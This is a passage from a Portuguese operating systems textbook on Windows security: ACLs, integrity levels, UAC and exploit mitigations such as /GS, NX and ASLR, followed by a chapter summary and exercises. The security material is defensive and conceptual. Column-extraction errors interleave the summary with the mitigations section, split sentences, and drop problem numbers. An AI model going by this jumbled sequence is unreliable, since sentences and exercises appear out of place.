então inicializá-la usando InitializeSecurityDescriptor. 
Essa chamada preenche o cabeçalho. Se o SID do dono 
não for conhecido, ele poderá ser pesquisado por nome 
usando LookupAccountSid. Ele pode então ser inserido 
no descritor de segurança. O mesmo vale para o SID do 
grupo, se houver. Em geral, esses SIDs serão o próprio 
SID de quem fez a chamada e um dos grupos deste, 
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mas o administrador do sistema pode preencher qual- 
quer SID. 

Nesse ponto, a DACL (ou SACL) do descritor de 
segurança pode ser inicializada com InitializeAcl. As 
entradas da ACL podem ser adicionadas por meio de 
AddAccessAllowedAce e AddAccessDeniedAce. Essas 
chamadas podem ser repetidas várias vezes para adi- 
cionar tantos ACEs quantos forem necessários. Delete- 
Ace pode ser usada para remover um elemento, isto é, 
ao modificar uma ACL existente em vez de construir 
uma nova ACL. Quando a ACL estiver pronta, a Set- 
SecurityDescriptorDacl poderá ser usada para juntá-la 
ao descritor de segurança. Por fim, quando o objeto 
é criado, o descritor de segurança que acabou de ser 
criado pode ser passado como um parâmetro para que 
faça parte do objeto. 


Anexa uma DACL a um descritor de segurança 





11.10.3 Implementação da segurança 


A segurança em um sistema Windows isolado é 
implementada por vários componentes, a maioria dos 
quais já vimos (a rede é uma outra história totalmente 
diferente e está além do escopo deste livro). O acesso 
ao sistema é tratado pelo winlogon e a autenticação, pe- 
los /sass. O resultado de um acesso bem-sucedido é um 
novo shell GUI (explorer.exe) com seu token de acesso 
associado. Esse processo usa as colmeias SECURITY e 
SAM do registro. A primeira ajusta a política geral de 
segurança e a última contém a informação de segurança 
para usuários individuais, conforme discutido na Seção 
123. 

Uma vez que um usuário tenha se conectado ao sis- 
tema, ocorrem as operações de segurança na abertura 


de um objeto a fim de que ele possa ser acessado. Toda 
chamada OpenXXX requer o nome do objeto que está 
sendo aberto e o conjunto de direitos necessários. Du- 
rante o processamento da abertura do objeto, o monitor 
de segurança (veja a Figura 11.11) verifica se quem cha- 
mou tem todos os direitos exigidos. Ele faz essa verifi- 
cação examinando o token de acesso de quem chamou e 
a DACL associada ao objeto. Ele percorre, na ordem, a 
lista de ACEs na ACL. Logo que encontra uma entrada 
com o SID igual ao SID do chamador ou de um dos seus 
grupos, o acesso encontrado lá é adotado como defini- 
tivo. Se todos os direitos necessários ao chamador esti- 
verem disponíveis, a abertura será bem-sucedida; caso 
contrário, ela falhará. 

As DACLs podem ter entradas de Negação ou de 
Permissão, como já vimos. Por isso, é comum colocar 
as entradas de negação de acesso à frente das entradas 
de permissão de acesso na ACL, para que um usuário 
com um acesso especificamente negado não entre pela 
porta dos fundos por ser um membro de um grupo que 
tenha acesso legítimo. 

Depois que um objeto foi aberto, ele é retornado um 
descritor para o chamador. Nas chamadas subsequentes, 
a única verificação realizada é se a operação que está 
sendo tentada estava no conjunto de operações requisi- 
tadas no momento da abertura. Isso visa a impedir que 
o processo que chamou abra um arquivo para leitura e, 
depois, tente escrever nele. Além disso, as chamadas 
nos descritores podem resultar em entradas no registro 
de auditoria, conforme solicitado pela SACL. 

O Windows incluiu outro recurso de segurança para 
lidar com problemas comuns de segurança do sistema 
utilizando ACLs. Existem novos SIDs de nível de inte- 
gridade no token do processo, e os objetos especificam 
um ACE de nível de integridade na SACL. O nível de 
integridade inibe operações de escrita no objeto, inde- 
pendentemente do ACE que esteja na DACL. Em parti- 
cular, o esquema de nível de integridade é utilizado para 
a proteção contra um processo do Internet Explorer que 
tenha sido comprometido por um invasor (talvez pelo 
usuário desavisado baixando código de um site desco- 
nhecido na web). O IE com direitos baixos, como é 
chamado, funciona com um nível de integridade defini- 
do como baixo. Por padrão, todos os arquivos e chaves 
do registro no sistema possuem nível de integridade mé- 
dio, e o IE funcionando com nível de integridade baixo 
não pode modificá-los. 

Diversos outros recursos de segurança foram adicio- 
nados ao Windows nos últimos anos. A partir do Ser- 
vice Pack 2 do Windows XP, a maior parte do sistema 
foi compilada com um flag (/GS) que fazia a validação 
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contra vários tipos de transbordamentos de buffer da 
pilha. Além disso, um recurso da arquitetura AMD64, 
denominado NX, foi utilizado para limitar a execução 
de código nas pilhas. O bit NX no processador está dis- 
ponível mesmo quando em execução no modo x86. NX 
significa no execute (não execute) e permite que pági- 
nas sejam marcadas de modo que nenhum código possa 
ser executado a partir delas. Assim sendo, se um ata- 
cante utiliza uma vulnerabilidade de transbordamento 
de buffer para inserir código em um processo, não é tão 
fácil saltar para o código e começar a executá-lo. 

O Windows Vista introduziu ainda mais recursos de 
segurança para dificultar o trabalho dos atacantes. O có- 
digo carregado no modo núcleo é verificado (por padrão 
nos sistemas x64) e carregado somente se devidamen- 
te assinado por uma autoridade conhecida e confiável. 
Os endereços nos quais DLLs e EXEs são carregados, 
bem como as alocações das pilhas, são razoavelmente 
misturados em cada sistema para tornar menos provável 
que um atacante consiga usar com sucesso o transbor- 
damento de buffer para acessar um endereço conhecido 
e começar a executar sequências de código que possam 
levar a um aumento de privilégio. Uma fração bem me- 
nor dos sistemas estará apta a ser atacada por confiar 
em binários armazenados em endereços-padrão. É mui- 
to mais provável que os sistemas simplesmente travem, 
convertendo um ataque potencial de elevação de privi- 
légios em outro menos perigoso, de recusa de serviço. 

Outra modificação foi a inclusão do que a Micro- 
soft chama de UAC (User Account Control — controle 
de conta do usuário), para tratar o problema crônico no 
Windows em que muitos usuários se conectam como 
administradores. O projeto do Windows não faz essa 
exigência, mas a negligência ao longo de várias versões 
tornou quase que impossível a utilização bem-sucedida 
do Windows sem perfil de administrador. Entretanto, 
ser administrador o tempo todo é algo perigoso, não só 
porque os erros do usuário podem danificar o sistema, 
mas também porque, se o usuário for enganado ou ata- 
cado e executar código que esteja tentando comprome- 
ter o sistema, o código terá acesso administrativo e pode 
acomodar-se bem fundo no sistema. 

Com o UAC, se ocorre uma tentativa de execução 
de uma operação que demanda acesso de administra- 
dor, o sistema sobrepõe um desktop especial e assume o 
controle para que somente entradas do usuário possam 
autorizar o acesso (semelhante à forma como CTRL- 
-ALT-DEL funciona para a segurança C2). É claro que, 
sem se tornar um administrador, um atacante também 
conseguiria destruir dados importantes para o usuário, 
ou seja, os arquivos particulares. Entretanto, o UAC 
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realmente ajuda a impedir certos tipos de ataque, e é 
sempre mais fácil recuperar um sistema comprometido 
se o atacante não conseguiu modificar os dados ou ar- 
quivos de sistema. 

O último recurso de segurança no Windows já foi 
mencionado por nós. Existe suporte para a criação de 
processos protegidos, que criam uma barreira de segu- 
rança. Em geral, o usuário (representado por um objeto 
de token) define os limites de privilégios no sistema. 
Quando um processo é criado, o usuário tem acesso 
para processar qualquer quantidade de recursos do nú- 
cleo para a criação de processos, depuração, nomes de 
caminhos, injeção de threads etc. Os processos prote- 
gidos são do acesso do usuário. A utilização original 
desse recurso no Windows foi permitir que o software 
de gerenciamento de direitos digitais proteja melhor o 
conteúdo. No Windows 8.1, os processos protegidos fo- 
ram expandidos para propósitos mais amigáveis, como 
proteger o sistema contra ataques em vez de proteger o 
conteúdo contra ataques do proprietário do sistema. 

Os esforços da Microsoft para aumentar a segurança 
do Windows foram acelerados nos últimos anos à medi- 
da que cada vez mais ataques foram disparados ao redor 
do mundo — alguns muito bem-sucedidos, deixando 
países inteiros e grandes empresas off-line e gerando 
custos de bilhões de dólares. A maior parte dos ataques 
explora pequenos erros de código que levam ao trans- 
bordamento de buffer ou o uso da memória depois que 
ela é liberada, permitindo que o atacante insira códigos 
sobrescrevendo endereços de retorno, ponteiros de ex- 
ceção, ponteiros de função virtual e outros dados que 
controlam a execução dos programas. Muitos desses 
problemas poderiam ser evitados se linguagens segu- 
ras fossem utilizadas no lugar de C e C++. E mesmo 
com essas linguagens pouco seguras, muitas vulnerabi- 
lidades poderiam ser evitadas se os estudantes fossem 
mais bem treinados na compreensão das armadilhas da 
validação de parâmetros e dados. Afinal, muitos dos 
engenheiros de software que hoje escrevem código na 
Microsoft foram estudantes há alguns anos, assim como 
muitos de vocês que estão lendo este estudo de caso. 
Existem muitos livros disponíveis que falam sobre os 
pequenos erros de código que podem ser explorados em 
linguagens baseadas em ponteiros e como evitá-los (por 
exemplo, HOWARD e LEBLANK, 2009). 


11.10.4 Atenuações de segurança 


Seria Ótimo para os usuários se o software de compu- 
tador não tivesse defeitos, principalmente defeitos que 
podem ser explorados por hackers para tomar o controle 


de seu computador e roubar suas informações, ou que 
usam seu computador para fins ilegais, como os ataques 
distribuídos de recusa de serviço, comprometendo ou- 
tros computadores, e distribuição de spam ou outro tipo 
de material não solicitado. Infelizmente, isso ainda não 
é viável na prática, e os computadores continuam a ter 
vulnerabilidades de segurança. Os desenvolvedores de 
sistemas operacionais têm realizado esforços incríveis 
para minimizar o número de defeitos, com sucesso su- 
ficiente para que os invasores aumentem seu foco nos 
softwares aplicativos, ou plugins do navegador, como 
Adobe Flash, em vez do próprio sistema operacional. 

Os sistemas de computação ainda podem se tornar 
mais seguros por meio de técnicas de atenuação que 
torne mais difícil explorar vulnerabilidades, quando fo- 
rem encontradas. O Windows tem continuamente acres- 
centado melhorias em suas técnicas de atenuação nos 
dez anos que levaram ao Windows 8.1. 

As atenuações listadas frustram diferentes etapas 
exigidas para a exploração generalizada e bem-sucedida 
dos sistemas Windows. Algumas oferecem defesa em 
profundidade contra ataques que são capazes de con- 
tornar outras atenuações. /GS protege contra ataques de 
transbordamento de pilha que poderiam permitir que os 
atacantes modifiquem endereços de retorno, ponteiros 
de função e tratadores de exceção. O reforço de exceção 
acrescenta verificações adicionais para que as cadeias 
de endereços do tratador de exceção não sejam sobres- 
critas. A proteção NX (não execute) requer que atacan- 
tes bem-sucedidos apontem o contador de programa 
não apenas para um payload de dados, mas para o códi- 
go que o sistema marcou como executável. Em geral, os 
atacantes tentam contornar proteções NX usando técni- 
cas de programação orientada a retorno ou retorno 
a libC, que apontam o contador de programa para frag- 
mentos de código que lhes permitem montar um ata- 
que. ASLR (Address Space Layout Randomization 
— Randomização do esquema do espaço de endereços) 
engana tais ataques, tornando mais difícil que um ata- 
cante saiba de antemão onde o código, pilhas e outras 
estruturas de dados são carregadas no espaço de ende- 
reços. O trabalho recente mostra como programas em 
execução podem se randomizar continuamente a cada 
poucos segundos, tornando os ataques ainda mais difi- 
ceis (GIUFFRIDA et al., 2012). 

O reforço da memória heap é uma série de ate- 
nuações adicionadas à implementação da heap pelo 
Windows, tornando mais difícil a exploração de vul- 
nerabilidades como a escrita além dos limites de uma 
alocação de heap, ou alguns casos de continuação do 
uso de um bloco da heap após sua liberação. VTGuard 
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(ele) TEREE] Algumas das principais atenuações de segurança no Windows. 





Atenuação 


Descrição 





Flag /GS do compilador 


Acrescenta canário aos quadros da pilha para proteger destinos de desvio do código 





Reforço de exceção 


Restringe qual código pode ser invocado como tratadores de exceção 





Proteção NX MMU 


Marca o código como não executável para impedir payloads de ataque 





ASLR 


Torna aleatório o espaço de endereços para dificultar os ataques de programação orientada a retorno 





Reforço da heap 


Verifica erros comuns de uso da heap 





VTGuard 


Inclui verificações para validar tabelas de função virtual 





Integridade de código 


Verifica se bibliotecas e drivers estão devidamente assinados com criptografia 





Patchguard 


Detecta tentativas para modificar dados do núcleo, por exemplo, rootkits 





Windows Update 


Oferece correções de segurança regulares para remover vulnerabilidades 





Windows Defender 








Capacidade antivírus básica embutida 





acrescenta verificações adicionais no código particular- 
mente sensível, impedindo a exploração de vulnerabi- 
lidades de uso após liberação relacionadas a tabelas de 
função virtual em C++. 

Integridade de código é a proteção no nível do nú- 
cleo contra a carga de código executável arbitrário nos 
processos. Ela verifica se programas e bibliotecas foram 
assinados criptograficamente por um publicador confi- 
ável. Essas verificações trabalham em conjunto com o 
gerenciador de memória para verificar o código a cada 
página sempre que as páginas individuais são recupera- 
das do disco. Patchguard é uma atenuação no nível do 
núcleo que tenta detectar rootkits, projetados para evitar 
que uma exploração bem-sucedida seja detectada. 

Windows Update é um serviço automatizado que 
oferece reparos para vulnerabilidades de segurança, 
reparando programas e bibliotecas afetadas dentro do 
Windows. Muitas das vulnerabilidades reparadas fo- 
ram relatadas por pesquisadores de segurança, e suas 
contribuições são reconhecidas nas notas anexadas a 
cada reparo. Ironicamente, as próprias atualizações de 
segurança impõem um risco significativo. Quase todas 
as vulnerabilidades usadas pelos atacantes são explora- 
das apenas depois que um reparo é publicado pela Mi- 
crosoft. Isso porque a engenharia reversa dos próprios 
reparos é a principal forma como os hackers descobrem 
vulnerabilidades nos sistemas. Assim, os sistemas que 
não tiverem aplicado todas as atualizações conhecidas 
de imediato estão suscetíveis a ataques. A comunida- 
de de pesquisa em segurança normalmente insiste para 
que as empresas reparem todas as vulnerabilidades en- 
contradas dentro de um período de tempo razoável. A 
frequência de reparos mensal, usada pela Microsoft, é 


um meio-termo entre manter a comunidade satisfeita e 
a frequência com que os usuários devem lidar com os 
reparos para manter seus sistemas seguros. 

A exceção a isso são as chamadas vulnerabilidades 
do dia zero. Estes são defeitos exploráveis cuja existên- 
cia não é conhecida antes que seu uso seja detectado. 
Felizmente, as vulnerabilidades do dia zero são conside- 
radas raras, e dias zero confiavelmente exploráveis são 
ainda mais raros, graças à eficácia das medidas de ate- 
nuação descritas aqui. Existe um mercado negro nesse 
tipo de vulnerabilidade. Acredita-se que as atenuações 
nas versões mais recentes do Windows estejam fazendo 
com que o preço de mercado de uma vulnerabilidade do 
dia zero útil suba de forma muito brusca. 

Por fim, o software antivírus tornou-se uma fer- 
ramenta tão crítica para o combate ao malware que o 
Windows inclui uma versão básica dentro do sistema 
operacional, chamada Windows Defender. O software 
antivírus conecta-se às operações do núcleo para detec- 
tar o malware dentro dos arquivos, além de reconhecer 
padrões de comportamento que são usados por instân- 
cias específicas (ou categorias gerais) de malware. Esses 
comportamentos incluem as técnicas usadas para sobre- 
viver a reinicializações, modificar o registro para alterar 
o comportamento do sistema e disparar processos e ser- 
viços em particular, necessários para implementar um 
ataque. Ainda que o Windows Defender ofereça uma 
proteção razoavelmente boa contra o malware mais co- 
mum, muitos usuários preferem comprar um software 
antivírus de terceiros. 

Muitas dessas atenuações estão sob o controle de 
flags do compilador e ligador. Se as aplicações, os drivers 
de dispositivo do núcleo ou bibliotecas de plugin lerem 
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dados para a memória executável ou incluírem código 
sem que /GS e ASLR estejam habilitados, as atenuações 
não estarão presentes e quaisquer vulnerabilidades nos 
programas serão muito mais fáceis de serem exploradas. 
Felizmente, nos últimos anos, os riscos de não habilitar 
as atenuações estão sendo bastante compreendidos pe- 
los desenvolvedores de software, e as atenuações geral- 
mente são habilitadas. 

As duas últimas atenuações na lista estão sob o con- 
trole do usuário ou do administrador de cada sistema de 


11.11 Resumo 


No Windows, o modo núcleo está estruturado na 
HAL, nas camadas executiva e de núcleo do NTOS e 
um grande número de drivers de dispositivos que imple- 
mentam tudo, desde serviços de dispositivos e sistemas 
de arquivos a redes e gráficos. A HAL esconde de outros 
componentes certas diferenças de hardware. A camada 
do núcleo gerencia as CPUs de modo que elas suportem 
multithreading e sincronização, e a camada executiva 
implementa a maioria dos serviços do modo núcleo. 

O executivo baseia-se em objetos do modo núcleo 
que representam as principais estruturas de dados, in- 
cluindo processos, threads, seções da memória, drivers, 
dispositivos e sincronização de objetos, entre outros. Os 
processos do usuário criam objetos por meio de chama- 
das de serviços do sistema e devolvem referências de 
descritores que podem ser utilizados nas chamadas de 
sistema subsequentes aos componentes do executivo. O 
sistema operacional também cria objetos internamente. 
O gerenciador de objetos mantém um espaço de nomes 
no qual objetos podem ser inseridos para buscas futuras. 

Os objetos mais importantes no Windows são pro- 
cessos, threads e seções. Os processos possuem espa- 
ços de endereçamento virtual e são contêineres para os 
recursos. Os threads são a unidade de execução e são 
escalonados pela camada do núcleo utilizando um al- 
goritmo de prioridade no qual o thread pronto de mais 
alta prioridade sempre é executado, realizando a pre- 
empção dos threads de prioridade mais baixa conforme 
necessário. As seções representam objetos na memória, 
como arquivos, que podem ser mapeados nos espaços 
de endereçamento dos processos. Imagens de progra- 
mas EXE e DLL são representadas como seções, bem 
como a memória compartilhada. 

O Windows suporta memória virtual paginada sob 
demanda. O algoritmo de paginação está baseado no 
conceito de conjunto de trabalho. Para otimizar o uso 
de memória, o sistema mantém diversos tipos de lis- 
tas de páginas. Essas diferentes listas de páginas são 


computação. Permitir que o Windows Update realize a 
instalação de correções ou garantir que o software anti- 
vírus atualizado seja instalado nos sistemas são as me- 
lhores técnicas para impedir a exploração dos sistemas. 
As versões do Windows usadas por clientes corporati- 
vos incluem recursos que facilitam aos administradores 
garantir que os sistemas conectados às suas redes este- 
jam totalmente atualizados e corretamente configurados 
com software antivírus. 


alimentadas por meio da redução dos conjuntos de 
trabalho utilizando-se fórmulas complexas que tentam 
reutilizar páginas físicas que não são referenciadas há 
muito tempo. O gerenciador de cache administra os 
endereços virtuais no núcleo, que podem ser utiliza- 
dos para mapear arquivos para a memória, melhorando 
drasticamente o desempenho da E/S para muitas aplica- 
ções, já que as operações de leitura podem ser atendidas 
sem acessos ao disco. 

As operações de E/S são realizadas pelos drivers de 
dispositivos, que seguem o Windows Driver Model. 
Cada driver começa inicializando um objeto de driver 
que contém os endereços dos procedimentos que po- 
dem ser chamados pelo sistema para manipular os dis- 
positivos. Os dispositivos reais são representados pelos 
objetos de dispositivos, que são criados a partir da des- 
crição da configuração do sistema ou pelo gerenciador 
plug-and-play à medida que ele descobre dispositivos 
quando enumerando os barramentos do sistema. Os dis- 
positivos são empilhados e os pacotes de solicitação de 
E/S são repassados às pilhas e atendidos pelos drivers 
de cada dispositivo na pilha de dispositivos. Operações 
de E/S são assíncronas por natureza, e os drivers nor- 
malmente enfileiram as solicitações para processamen- 
to futuro e retorno a quem os chamou. Os volumes dos 
sistemas de arquivos são implementados como disposi- 
tivos no sistema de E/S. 

O sistema de arquivos NTFS baseia-se em uma tabe- 
la mestre de arquivos, que possui um registro por arqui- 
vo ou diretório. Todos os metadados em um sistema de 
arquivos NTFS também são parte de um arquivo NTFS. 
Cada arquivo possui múltiplos atributos, que tanto po- 
dem estar no registro da MFT quanto não estarem resi- 
dentes (armazenados em blocos fora da MFT). O NTFS 
suporta Unicode, compactação, uso de diário, criptogra- 
fia e outros recursos. 

Por fim, o Windows possui um sistema de segurança 
sofisticado baseado nas listas de controle de acesso e nos 


níveis de integridade. Cada processo possui um token de 
autenticação que informa a identidade do usuário e quais 
privilégios especiais o processo possui (se houver). Cada 
objeto possui um descritor de segurança a ele associa- 
do, que aponta para uma lista de acesso discricionária, 
que contém entradas de acesso que podem permitir ou 


PROBLEMAS 


1. Indique uma vantagem e uma desvantagem do regis- 
tro em comparação com a existência de arquivos .ini 
individuais. 

2. Um mouse pode ter um, dois ou três botões. Todos os 
três tipos são usados. A HAL oculta essa diferença do 
restante do sistema operacional? Qual é o motivo? 

3. A HAL monitora o tempo a partir do ano 1601. Dê um 
exemplo de uma aplicação para essa característica. 

4. Na Seção 11.3.2, descrevemos os problemas causados 
por aplicações multithreading fechando descritores em 
um thread enquanto ainda os utilizam em outro. Uma 
possibilidade para corrigir esse problema seria inserir 
um campo de sequência. Como isso poderia ajudar? Que 
mudanças no sistema seriam necessárias? 

5. Muitos componentes do executivo (Figura 11.11) cha- 
mam outros componentes do executivo. Dê três exem- 
plos de um componente chamando outro, mas usando 
(seis) diferentes componentes ao todo. 

6. O Win32 não tem sinais. Se fossem introduzidos, eles 
poderiam existir por processo, por thread, por ambos ou 
por nenhum deles. Faça uma proposta e explique por que 
isso seria uma boa ideia. 

7. Uma alternativa ao uso de DLLs é ligar estaticamente 
cada programa com, precisamente, os procedimentos de 
biblioteca que ele de fato chama, nem mais nem menos. 
Se fosse introduzido, esse esquema teria mais sentido 
em máquinas clientes ou em máquinas servidoras? 

8. A discussão sobre o User-Mode Scheduling (UMS) do 
Windows mencionou que os threads do modo usuário e 
núcleo tinham pilhas diferentes. Quais são algumas das 
razões para a necessidade de pilhas separadas? 

9. O Windows utiliza páginas de 2 MB porque isso aumen- 
ta a eficiência da TLB, o que pode causar um impacto 
profundo no desempenho. Por que isso ocorre? Por que 
as páginas grandes de 2 MB não são usadas o tempo 
todo? 

10. Ha algum limite para o número de operações diferentes 
que podem ser definidas sobre um objeto do executivo? 
Em caso afirmativo, de onde vem esse limite? Em caso 
negativo, por quê? 

11. A chamada da API Win32 WaitForMultipleObjects 
permite que um thread seja bloqueado diante de um 
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negar acesso a indivíduos ou grupos. O Windows inse- 
riu diversos recursos de segurança nas últimas versões, 
incluindo o BitLocker para codificação de volumes intei- 
ros, randomização de espaços de endereçamento, pilhas 
não executáveis e outras medidas que tornam mais difi- 
cil o sucesso dos ataques. 


conjunto de objetos de sincronização cujos descritores 
são passados como parâmetros. Assim que algum deles 
é sinalizado, o thread que está chamando é liberado. É 
possível ter o conjunto de objetos de sincronização in- 
cluindo dois semáforos, um mutex e uma seção crítica? 
Por quê? (Dica: esta questão não é uma “pegadinha”, 
mas é preciso pensar bem.) 

12. Ao inicializar uma variável global em um programa 
com multithreading, um erro de programação comum é 
permitir uma condição de corrida onde a variável possa 
ser inicializada duas vezes. Por que isso poderia ser um 
problema? O Windows oferece a função da API InitOnce 
ExecuteOnce para impedir essas corridas. Como ela po- 
deria ser implementada? 

13. Cite três razões para que um processo possa ser finali- 
zado. Que motivo adicional poderia causar o término de 
um processo executado em uma aplicação moderna? 

14. Aplicações modernas precisam salvar seu estado em dis- 
co toda vez que o usuário deixa uma aplicação. Isso pa- 
rece ser ineficiente, pois os usuários poderão retornar a 
uma aplicação muitas vezes e a aplicação simplesmente 
continua funcionando. Por que o sistema operacional re- 
quer que as aplicações salvem seu estado com tanta fre- 
quência, em vez de fazer isso simplesmente no momento 
em que a aplicação de fato estiver para ser fechada”? 

15. Conforme descrito na Seção 11.4, existe uma tabela de 
descritores especial utilizada para alocar IDs de proces- 
sos e threads. Os algoritmos para as tabelas de descrito- 
res em geral alocam o primeiro descritor livre (mantendo 
a lista de livres na ordem LIFO). Nas versões recentes 
do Windows, isso foi modificado de forma que a tabela 
de IDs sempre mantenha a lista de livres na ordem FIFO. 
Qual o problema que a ordem LIFO potencialmente cau- 
sa na alocação de IDs de processos, e por que o UNIX 
não tem esse problema? 

16. Suponha que o quantum seja configurado como 20 ms, e 
o thread atual, na prioridade 24, tenha acabado de iniciar 
um quantum. De repente, uma operação de E/S termina 
e um thread de prioridade 28 fica pronto. Quanto tempo 
ele deve esperar para conseguir executar na CPU? 

17. No Windows, a prioridade atual é sempre maior ou igual 
à prioridade-base. Há alguma circunstância na qual faria 
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21. 


22. 
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24. 


25. 


26. 
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28. 


29. 


sentido ter a prioridade atual mais baixa que a priorida- 
de-base? Se sim, dê um exemplo; se não, por quê? 

O Windows usa um recurso chamado Autoboost para 
elevar temporariamente a prioridade de um thread que 
mantém um recurso exigido por um thread de prioridade 
mais alta. Como você acha que isso funciona? 

No Windows, é fácil implementar uma facilidade onde 
os threads em execução no núcleo podem temporaria- 
mente se conectar aos espaços de endereçamento de um 
processo diferente. Por que isso é muito mais difícil de 
implementar no modo usuário? Por que pode ser interes- 
sante fazê-lo? 

Cite duas maneiras de dar um tempo de resposta melhor 
aos threads em processos importantes. 

Mesmo quando existe muita memória livre suficiente, e 
o gerenciador de memória não precisa diminuir os con- 
juntos de trabalho, o sistema de paginação ainda pode 
estar gravando no disco com frequência. Por quê? 

Nas aplicações modernas, o Windows troca os processos 
na memória em vez de reduzir seu conjunto de trabalho e 
paginá-los. Por que isso seria mais eficiente? (Dica: isso 
faz muito menos diferença quando o disco é SSD.) 

Por que o automapeamento utilizado para acessar as pá- 
ginas físicas do diretório e da tabela de páginas de um 
processo sempre ocupa os mesmos 8 MB dos endereços 
virtuais do núcleo (no x86)? 

O x86 pode usar entradas de 64 ou 32 bits para a tabela 
de páginas. O Windows usa PTEs de 64 bits, de modo 
que o sistema pode acessar mais de 4 GB de memória. 
Com PTEs de 32 bits, o automapeamento usa apenas um 
PDE no diretório de página, e assim ocupa apenas 4 MB 
de endereços, em vez de 8 MB. Por que isso acontece? 
Se uma região do espaço de endereçamento virtual es- 
tiver reservada, mas não comprometida, será criado um 
VAD para essa região? Justifique sua resposta. 

Quais das transições mostradas na Figura 11.34 são de- 
cisões políticas, ao contrário dos movimentos necessá- 
rios forçados pelos eventos do sistema (por exemplo, um 
processo que esteja saindo e liberando suas páginas)? 
Suponha que uma página seja compartilhada e em dois 
conjuntos de trabalho ao mesmo tempo. Se ela for reti- 
rada de um dos conjuntos de trabalho, para onde ela irá, 
na Figura 11.34? O que acontece quando é retirada do 
segundo conjunto de trabalho? 

Quando um processo remove o mapeamento de uma pági- 
na de pilha limpa, ele faz a transição (5) da Figura 11.34. 
Para onde vai uma página suja da pilha quando desmape- 
ada? Por que não há transição para a lista de modificadas 
quando uma página suja da pilha é desmapeada? 
Imagine que um objeto despachante representando algum 
tipo de trava exclusiva (como um mutex) está marcado 
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31. 


para utilizar um evento de notificação em vez de um de 
sincronização para anunciar que a trava foi liberada. Por 
que isso seria ruim? O quanto a resposta dependeria do 
tempo de retenção da trava, do tamanho do quantum e 
do fato de o sistema ser um multiprocessador? 

Para dar suporte ao POSIX, a função da API NtCreate- 
Process nativa admite a duplicação de um processo a 
fim de dar suporte a fork. No UNIX, fork é seguido de 
perto por um exec na maior parte do tempo. Um exem- 
plo onde isso era usado historicamente é no programa 
dump(8S) do UNIX Berkeley, que faria o backup de 
discos para fita magnética. Fork era usado como um 
modo de gerar pontos de salvaguarda do programa de 
dump, para que este pudesse ser reiniciado se houves- 
se um erro com a unidade de fita. Dê um exemplo de 
como o Windows poderia fazer algo semelhante usando 
NtCreateProcess. (Dica: considere os processos que 
hospedam DLLs para implementar a funcionalidade ofe- 
recida por um terceiro.) 

Um arquivo tem o seguinte mapeamento. Dê as entradas 
de séries da MFT. 
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Considere o registro da MFT da Figura 11.41. Suponha 
que o arquivo crescesse e um décimo bloco fosse atri- 
buído ao fim do arquivo. O número desse bloco é 66. 
Com o que o registro da MFT se pareceria agora? 

Na Figura 11.44(b), as duas primeiras séries são de oito 
blocos cada. O fato de elas serem iguais é apenas um aci- 
dente ou isso tem relação com o modo de funcionamento 
da compactação? Justifique sua resposta. 

Suponha que você queira construir um Windows Lite. 
Quais dos campos da Figura 11.45 poderiam ser removi- 
dos sem enfraquecer a segurança do sistema? 

A estratégia de atenuação para melhorar a segurança ape- 
sar da presença contínua de vulnerabilidades tem sido 
muito bem-sucedida. Os ataques modernos são muito 
sofisticados, geralmente exigindo a presença de várias 
vulnerabilidades para a criação de uma façanha confiá- 
vel. Uma das vulnerabilidades que costuma ser exigida é 
um vazamento de informações. Explique como um vaza- 
mento de informações pode ser usado para derrotar a ale- 
atoriedade do espaço de endereçamento a fim de lançar 
um ataque com base na programação orientada a retorno. 
Um modelo de extensão utilizado por muitos programas 
(navegadores web, Office, servidores COM) envolve a 
hospedagem de DLLs para criar ganchos e estender sua 
funcionalidade subjacente. Seria esse um modelo razoá- 
vel para ser utilizado em um serviço baseado em RPC, 
desde que tenha o cuidado de personificar os clientes 
antes de carregar a DLL? Por que não? 
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Quando em execução em uma máquina NUMA, sem- 
pre que o gerenciador de memória do Windows precisa 
alocar uma página física para tratar de uma falta de pá- 
gina, ele tenta utilizar uma página do nó NUMA para o 
processador ideal do thread corrente. Por quê? E se o 
thread estiver atualmente sendo executado em um pro- 
cessador diferente? 

Dê alguns exemplos nos quais uma aplicação consegui- 
ria se recuperar facilmente a partir de uma cópia de se- 
gurança com base em uma cópia sombra do volume, em 
vez de a partir do estado do disco após um travamento 
do sistema. 

Na Seção 11.10, a oferta de mais memória para a heap 
do processo foi citada como um dos cenários que reque- 
rem o fornecimento de páginas zeradas para que os re- 
quisitos de segurança sejam satisfeitos. Dê um ou dois 
exemplos de operações da memória virtual que precisam 
de páginas zeradas. 

O Windows contém um hipervisor que permite a execu- 
ção simultânea de vários sistemas operacionais. Isso está 
disponível em clientes, mas é muito mais importante na 
computação em nuvem. Quando uma atualização de se- 
gurança é aplicada a um sistema operacional hóspede, 


41. 


42. 
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isso não é muito diferente da aplicação de correções a 
um servidor. Porém, quando uma atualização de segu- 
rança é aplicada ao sistema operacional raiz, este pode 
ser um grande problema para os usuários da computação 
em nuvem. Qual é a natureza do problema? O que pode 
ser feito a respeito disso? 

O comando regedit pode ser usado para exportar uma 
parte ou a totalidade dos registros para um arquivo de 
texto, em todas as versões atuais do Windows. Salve o 
registro várias vezes durante uma sessão de trabalho 
e veja o que muda. Se você tiver acesso a um compu- 
tador com Windows no qual você possa instalar soft- 
ware ou hardware, descubra quais mudanças ocorrem 
quando um programa ou um dispositivo é adicionado 
ou removido. 

Escreva um programa UNIX que simule a escrita de 
um arquivo NTFS com vários fluxos. Ele deverá aceitar 
uma lista de um ou mais arquivos como parâmetros e 
gravar um arquivo de saída que contenha um fluxo com 
os atributos de todos os parâmetros e outros fluxos com 
o conteúdo de cada um dos parâmetros. Agora, escreva 
um segundo programa para relatar sobre os atributos e 
os fluxos e extrair todos os componentes. 


CAPÍTULO 


12 





os 11 capítulos anteriores, abordamos uma série de 

fundamentos e vimos muitos conceitos e exemplos 

relacionados aos sistemas operacionais. Mas o es- 

tudo dos sistemas operacionais existentes é dife- 

rente do projeto de um novo sistema operacional. 
Neste capítulo, examinaremos rapidamente algumas 
das questões e ponderações que os projetistas de sis- 
temas operacionais devem levar em consideração du- 
rante o projeto e a implementação de um novo sistema 
operacional. 

Existe um certo folclore sobre o que é bom ou ruim 
em torno da comunidade de sistemas operacionais, em- 
bora surpreendentemente pouco tenha sido escrito sobre 
o tema. Talvez o livro mais importante seja o clássico 
de Fred Brooks (1975), chamado The Mythical Man 
Month, no qual ele relata suas experiências no projeto 
e na implementação do OS/360 da IBM. A edição de 
20º aniversário revisa parte da matéria e adiciona quatro 
capítulos novos (BROOKS, 1995). 

Três artigos clássicos sobre o projeto de sistemas 
operacionais são: “Hints for Computer System Design” 
